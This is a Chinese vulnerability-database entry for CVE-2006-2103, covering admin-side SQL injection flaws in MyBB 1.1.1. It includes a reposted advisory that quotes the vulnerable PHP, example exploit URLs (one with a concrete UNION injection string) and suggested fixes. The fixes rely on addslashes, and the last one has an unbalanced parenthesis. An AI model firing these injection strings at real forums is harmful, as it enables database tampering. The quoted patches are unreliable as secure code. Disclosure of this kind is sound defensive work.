MyBB 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195179 漏洞类型 SQL注入
发布时间 2006-04-29 更新时间 2006-04-29
CVE编号 CVE-2006-2103 CNNVD-ID CNNVD-200604-543
漏洞平台 N/A CVSS评分 2.1
|漏洞来源
https://www.securityfocus.com/bid/83967
https://cxsecurity.com/issue/WLB-2006050005
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-543
|漏洞详情
MyBB(MyBulletinBoard)1.1.1中存在SQL注入漏洞。这使得远程认证管理员可以借助于(a)admin/adminlogs.php中的查询字符串($querystring变量)(该变量没有在adminfunctions.php中正确地处理),或传递到(b)admin/templates.php中的参数(2)setid、(3)expand、(4)title或(5)sid2执行任意SQL命令。
|漏洞EXP
MyBB Local SQL Injections ..

[ This Local Injections Only For Admin ]

* 1 *

[code]

adminfunctions.php , line 730

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['a
ction']."','".$querystring."','".$ipaddress."')");

$querystring = Not Filtered

Exploit Exm.

/admin/adminlogs.php?action=view&D3vil-0x1=[SQL]'

Fix , Replace with

$db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES ('".$mybbadmin['uid']."','".$now."','".$scriptname."','".$mybb->input['a
ction']."','".addslashes($querystring)."','".$ipaddress."')");

[/code]

* 2 *

[code]

templates.php , lines 107 to 114

$newtemplate = array(

"title" => addslashes($mybb->input['title']),

"template" => addslashes($mybb->input['template']),

"sid" => $mybb->input['setid'],

"version" => $mybboard['vercode'],

"status" => "",

"dateline" => time()

);

sid = Not Filtered

Exploit Exm.

/admin/templates.php?action=do_add&title=Devil&template=Div&setid=[SQL]'

Fix Replace with

$newtemplate = array(

"title" => addslashes($mybb->input['title']),

"template" => addslashes($mybb->input['template']),

"sid" => addslashes($mybb->input['setid']),

"version" => $mybboard['vercode'],

"status" => "",

"dateline" => time()

);

[/code]

* 3 *

[code]

templates.php , line 600

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".$expand."'");

$expand = $mybb->input['expand']; = Not Filtered

Exploit Exm.

/admin/templates.php?expand=' UNION ALL SELECT 1,2/*

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templatesets WHERE sid='".intval($expand)."'");

[/code]

* 4 *

[code]

templates.php , line 424

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid1']."'");

$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".$mybb->input['title']."' AND sid='".$mybb->input['sid2']."'");

Exploit Exm.

/admin/templates.php?action=diff&title=[SQL]'

/admin/templates.php?action=diff&sid2=[SQL]'

Fix Replace With

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes($mybb->input['title'])."' AND sid='".intval($mybb->input['sid1'])."'");

$template1 = $db->fetch_array($query);

$query = $db->query("SELECT * FROM ".TABLE_PREFIX."templates WHERE title='".addslashes(($mybb->input['title'])."' AND sid='".intval($mybb->input['sid2'])."'");

[/code]

MyBB Has Many Local Bugs ,, Fix It s00n ;)
|受影响的产品
MyBulletinBoard MyBulletinBoard 1.1.1
|参考资料

来源:XF
名称:mybb-adminfunctions-templates-sql-injection(26103)
链接:http://xforce.iss.net/xforce/xfdb/26103
来源:BUGTRAQ
名称:20060427MyBB1.1.1LocalSQLInjections
链接:http://www.securityfocus.com/archive/1/archive/1/432229/100/0/threaded
来源:OSVDB
名称:25075
链接:http://www.osvdb.org/25075
来源:OSVDB
名称:25074
链接:http://www.osvdb.org/25074
来源:VUPEN
名称:ADV-2006-1566
链接:http://www.frsirt.com/english/advisories/2006/1566
来源:SECUNIA
名称:19865
链接:http://secunia.com/advisories/19865
来源:SREASON
名称:808
链接:http://securityreason.com/securityalert/808